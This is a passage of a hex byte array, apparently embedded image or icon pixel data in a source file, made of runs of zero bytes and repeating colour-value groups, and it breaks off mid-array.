0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xff, 0x00, 0x00, 0xe8, 0xff, 0x00, 0x00, 0xe8, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0xee, 0xff, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0xe8, 0xff, 0x0f, 0x00, 0xe8, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0xff, 0x00, 0x00, 0xea, 0xff, 0x00, 0x00, 0xde, 0xff, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe7, 0xff, 0x00, 0x00, 0xe9, 0xfe, 0x00, 0x00, 0xeb, 0xfd, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf9, 0xff, 0x00, 0x00, 0xea, 0xff, 0x23, 0x00, 0xec, 0xfe, 0x3c, 0x02, 0xed, 0xfe, 0x00, 0x00, 0xf5, 0xff, 0x00, 0x00, 0xe9, 0xff, 0x20, 0x00, 0xe6, 0xfe, 0xd4, 0x01, 0xdc, 0xfc, 0x00, 0x00, 0xf1, 0xff, 0x00, 0x09, 0xcf, 0xfc, 0x00, 0x00, 0xe8, 0xff, 0x84, 0x00, 0xff, 0xff, 0x00, 0x00, 0xf1, 0xff, 0x00, 0x00, 0xeb, 0xff, 0x00, 0x00, 0xeb, 0xff, 0x00, 0x00, 0xed, 0xff, 0x00, 0x00, 0xed, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe6, 0xff, 0x00, 0x00, 0xeb, 0xfe, 0x23, 0x00, 0xf0, 0xfb, 0x0b, 0x00, 0xdf, 0xff, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0xe4, 0xff, 0x7b, 0x00, 0xe0, 0xfe, 0xff, 0x05, 0xf1, 0xff, 0x38, 0x05, 0xeb, 0xfe, 0x00, 0x04, 0xe6, 0xfd, 0xa7, 0x01, 0xd9, 0xfe, 0xff, 0x02, 0xeb, 0xfe, 0x84, 0x04, 0xea, 0xff, 0x00, 0x03, 0xea, 0xff, 0x58, 0x00, 0xdc, 0xfe, 0xff, 0x00, 0xe9, 0xfd, 0x5c, 0x00, 0xe6, 0xfd, 0x00, 0x00, 0xee, 0xfe, 0x00, 0x00, 0xed, 0xff, 0x2f, 0x00, 0xee, 0xff, 0x20, 0x00, 0xee, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0xee, 0xff, 0x00, 0x00, 0xf1, 0xff, 0x00, 0x00, 0xe9, 0xff, 0x00, 0x00, 0xe4, 0xff, 0x6f, 0x00, 0xe5, 0xfe, 0xef, 0x04, 0xec, 0xfe, 0x2b, 0x04, 0xe0, 0xfe, 0x00, 0x02, 0xe0, 0xfe, 0xe7, 0x01, 0xd8, 0xfe, 0xff, 0x03, 0xe2, 0xfe, 0xef, 0x04, 0xed, 0xff, 0x58, 0x02, 0xdc, 0xfe, 0xff, 0x01, 0xd9, 0xfe, 0xff, 0x03, 0xdd, 0xfe, 0xeb, 0x05, 0xed, 0xff, 0x58, 0x02, 0xe1, 0xfe, 0xff, 0x01, 0xd8, 0xfe, 0xff, 0x02, 0xdf, 0xfe, 0xc7, 0x07, 0xd5, 0xfc, 0x00, 0x02, 0xec, 0xfe, 0x4b, 0x00, 0xe2, 0xfe, 0xff, 0x00, 0xe6, 0xff, 0x4f, 0x00, 0xe5, 0xff, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0xe9, 0xff, 0x00, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xee, 0xff, 0x14, 0x00, 0xf3, 0xff, 0x13, 0x00, 0xed, 0xfd, 0x00, 0x02, 0xe5, 0xff, 0x00, 0x01, 0xe1, 0xff, 0x97, 0x01, 0xd9, 0xfe, 0xff, 0x02, 0xe0, 0xfe, 0xf8, 0x04, 0xec, 0xfe, 0x9b, 0x01, 0xda, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x03, 0xde, 0xfe, 0xfc, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xde, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xdc, 0xfe, 0xef, 0x04, 0xeb, 0xfe, 0xb8, 0x02, 0xde, 0xfe, 0xff, 0x01, 0xd8, 0xfe, 0xff, 0x02, 0xe3, 0xfd, 0x78, 0x01, 0xe0, 0xfd, 0x00, 0x03, 0xed, 0xff, 0x00, 0x00, 0xee, 0xff, 0x3f, 0x00, 0xe9, 0xff, 0x0c, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdf, 0xfe, 0x2f, 0x00, 0xe5, 0xfe, 0xff, 0x01, 0xea, 0xfd, 0x8c, 0x05, 0xf3, 0xfd, 0x17, 0x03, 0xe0, 0xfd, 0xc0, 0x01, 0xd9, 0xfe, 0xff, 0x01, 0xda, 0xfe, 0xff, 0x03, 0xdd, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x01, 0xd9, 0xfe, 0xff, 0x02, 0xdf, 0xfe, 0xab, 0x04, 0xed, 0xfe, 0x24, 0x03, 0xe9, 0xfe, 0xac, 0x00, 0xe2, 0xfe, 0xff, 0x00, 0xda, 0xfc, 0x00, 0x00, 0xe4, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0xf0, 0xff, 0x00, 0x00, 0xee, 0xff, 0x00, 0x03, 0xdb, 0xfe, 0x27, 0x01, 0xd9, 0xfe, 0xf8, 0x01, 0xdb, 0xfe, 0xff, 0x02, 0xe3, 0xfe, 0xef, 0x03, 0xdd, 0xfe, 0xf8, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x03, 0xde, 0xfe, 0xf7, 0x02, 0xe0, 0xfe, 0xfb, 0x01, 0xda, 0xfe, 0xff, 0x01, 0xd9, 0xfe, 0xff, 0x01, 0xd7, 0xfe, 0x00, 0x00, 0xdf, 0xff, 0x00, 0x00, 0xef, 0xff, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0xec, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf5, 0xfe, 0x00, 0x00, 0xe9, 0xff, 0x63, 0x00, 0xed, 0xfe, 0x38, 0x03, 0xed, 0xfd, 0x1b, 0x02, 0xe0, 0xfe, 0x27, 0x01, 0xda, 0xfe, 0xf3, 0x01, 0xd9, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x01, 0xda, 0xfe, 0xef, 0x00, 0xca, 0xfc, 0x00, 0x05, 0xed, 0xfe, 0x1f, 0x00, 0xec, 0xfe, 0x43, 0x00, 0xea, 0xff, 0x30, 0x00, 0xeb, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdd, 0xfd, 0x00, 0x00, 0xdd, 0xfd, 0x8b, 0x00, 0xdd, 0xfe, 0xff, 0x02, 0xe3, 0xfe, 0xec, 0x03, 0xe7, 0xfe, 0xdc, 0x02, 0xdb, 0xfe, 0xfb, 0x02, 0xdb, 0xfe, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xde, 0xfd, 0xff, 0x05, 0xde, 0xfd, 0xff, 0x05, 0xde, 0xfd, 0xff, 0x05, 0xdf, 0xfd, 0xff, 0x05, 0xdf, 0xfd, 0xff, 0x06, 0xdf, 0xfd, 0xff, 0x06, 0xdf, 0xfd, 0xff, 0x06, 0xdf, 0xfd, 0xff, 0x05, 0xdf, 0xfd, 0xff, 0x05, 0xdf, 0xfd, 0xff, 0x05, 0xde, 0xfd, 0xff, 0x05, 0xde, 0xfd, 0xff, 0x04, 0xde, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xdc, 0xfe, 0xf8, 0x07, 0xea, 0xfe, 0xd7, 0x03, 0xe1, 0xfe, 0xf0, 0x01, 0xdd, 0xfe, 0xff, 0x00, 0xdb, 